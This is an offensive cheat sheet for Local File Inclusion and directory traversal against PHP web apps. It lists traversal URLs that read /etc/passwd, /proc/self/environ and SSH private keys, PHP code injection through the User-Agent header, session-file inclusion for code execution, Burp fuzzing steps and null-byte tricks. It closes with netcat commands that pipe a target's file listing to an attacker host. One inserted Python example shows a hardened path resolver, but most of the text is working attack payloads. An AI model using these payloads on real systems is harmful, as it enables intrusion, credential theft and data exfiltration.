Local File Inclusion (LFI)

AKA: Directory Traversal

Local File Inclusion

LFI likely (a file name is passed straight into the page):
http://$IP/dept/manage.php?notes=files/nineveh.txt

Testing:
http://$IP/dept/manage.php?notes=files/../../../../etc/passwd
http://$IP/dept/manage.php?notes=files/../../../../../../../etc/passwd
http://$IP/dept/manage.php?notes=/myNotes/../../../etc/passwd

Automation

nikto  ..may flag a known LFI path (if the software is recognised)
python fi-cyberscan.py -t http://$IP/cyber.php?page= -m1
fimap -u $IP  ..in kali

Whoami Home SSH:

whoami:
/proc/self/status  ..match the Uid/Gid values (100:101 here) with /etc/passwd to learn which user the web server runs as

Home directory:
/etc/passwd                    ..learn home path
/var/lib/asterisk/             ..check home path
/var/lib/asterisk/.ssh/id_rsa  ..priv ssh key here?

Code execution via 'environ'

  • If you can include 'environ', request headers you control are reflected in it and may be executed as code

  • Burp > Repeater > /proc/self/environ

graph.php?lang=../../../proc/self/environ%00&module=Accounts
User-Agent: <?php echo "hello"; ?>
Go  ..send from Repeater and check the response

Fuzzing LFI

graph.php?lang=../../../etc/passwd%00&module=Accounts
graph.php?lang=../../../$attack$%00&module=Accounts
                           |
                         Intruder payload position (keyword to fuzz)

Payloads > Load > burp-fuzz > 
LFI-LogFileCheck.txt
LFI-InterstingFiles.txt

Start Attack
Sort by Length  ..a response length that differs from the baseline marks a hit

RFI from LFI (PHP sessions)

  • If you can locate the file where PHP stores the 'session' behind your cookie

  • You may be able to include it from Burp Repeater to get execution

cd vtiger/  ..if you have the source
grep -R phpinfo\(\)  ..a page that prints phpinfo() reveals session.save_path
maybe: Image/Canvas/PDF.php  ..if we can access it?
Find where the session is saved (PHP names the file sess_<PHPSESSID>):
ex: /tmp/sess_xyz123

Repeater:
graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts
Might give you execution

Directory Traversals

--------------------
--------------------
/images/./photo.jpg             .. ok
/images/../photo.jpg            .. error
/images/../images/photo.jpg     .. win!

http://abc.so/images/../photo.png                              ..ok
http://abc.so/images/../../../../../photo.png                  ..ok
http://abc.so/../../../../../../../../../../secret.key         ..nothing

http://abc.so/file.php?file=photo.png
http://abc.so/file.php?file=./photo.png                  .. added ./
http://abc.so/file.php?file=./file.php                   .. 'real' file.php
http://abc.so/file.php?file=./../../../../../etc/passwd  .. worked !!
http://abc.so/file.php?file=./../../../../../boot.ini    .. Windows target !!


--------------------
--------------------
Filtered: can't leave /var/www/  ..the check only looks at the path prefix, so ../ after the prefix still escapes (last line below)

http://abc.so/
http://abc.so/file.php?file=/var/www/photo.png                           ..ok
http://abc.so/file.php?file=/secret.key                                  ..fail
http://abc.so/file.php?file=./../../../../../../../../photo.png          ..fail
http://abc.so/file.php?file=/var/www/file.php                            ..ok
http://abc.so/file.php?file=/var/www/../../../../../../../../etc/passwd  ..ok

NULL BYTE

  • %00  ..URL-encoded null byte

  • Appending a NULL BYTE truncates the string in the underlying C file functions, so any suffix the server adds is dropped (on older systems)

  • Works in Perl and older versions of PHP (fixed in PHP 5.3.4)

  • Scenario: the server appends .png automatically to the page you request

http://abc.so/file.php?file=photo                 .. ok
http://abc.so/file.php?file=photo.png             .. nothing
http://abc.so/file.php?file=photo.png%00          .. ok
http://abc.so/file.php?file=file.php%00           .. ok
http://abc.so/file.php?file=/../../etc/passwd%00  .. win
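Added example (not from the page): the prefix-only filter described under "Filtered: can't leave /var/www/" next to a hardened resolver that normalises the path, refuses control characters such as %00 (the NULL BYTE section) instead of truncating, and keeps an extension allowlist. WEB_ROOT and the sample request values are constructed to mirror the page's file.php?file= tests.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed document root, matching the page's /var/www examples.
WEB_ROOT = "/var/www"

def weak_filter(file_param: str) -> bool:
    """The "can't leave /var/www/" filter from the page: a prefix check on
    the decoded value. Nothing is normalised, so a value that starts with
    /var/www/ and then climbs out with ../ is still accepted."""
    return unquote(file_param).startswith(WEB_ROOT + "/")

def hardened_resolve(file_param: str, base: str = WEB_ROOT,
                     allowed_ext=(".png", ".jpg", ".txt")) -> Optional[str]:
    """Return the path to serve, or None to refuse the request.
    Decode once, reject control characters (so %00 is refused, never
    truncated), treat the value as a name relative to base, normalise it,
    then require that it is still inside base with an allowed extension.
    On a live server also apply os.path.realpath() to both sides so a
    symlink under base cannot point back out of it."""
    path = unquote(file_param)
    if any(ord(ch) < 0x20 for ch in path):
        return None
    candidate = posixpath.normpath(posixpath.join(base, path.lstrip("/")))
    if posixpath.commonpath([base, candidate]) != base:
        return None
    if posixpath.splitext(candidate)[1].lower() not in allowed_ext:
        return None
    return candidate

# Constructed request values modelled on the page's file.php?file= tests.
SAMPLE_PARAMS = [
    "photo.png",
    "./photo.png",
    "./file.php",
    "./../../../../../etc/passwd",
    "/var/www/../../../../../../../../etc/passwd",
    "%2e%2e/%2e%2e/etc/passwd",
    "photo.png%00",
]

def compare(params=SAMPLE_PARAMS) -> dict:
    """Map each value to (weak filter verdict, hardened resolver result)."""
    return {p: (weak_filter(p), hardened_resolve(p)) for p in params}

if __name__ == "__main__":
    for param, (weak_ok, served) in compare().items():
        print(f"{param:46} weak={str(weak_ok):5} hardened={served}")
```

The weak filter waves through the /var/www/../../ value the page marks "..ok" while the resolver refuses it along with every other escape, and only the two plain image requests come back with a path to serve.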

Netcat Tricks

target (+ is a URL-encoded space):
echo+abc+|nc+10.x.x.x:9000    ..test
find+/+|nc+10.x.x.x:9000      ..pull all files

kali:
nc -nvlp 9000 > findall.txt   ..receive
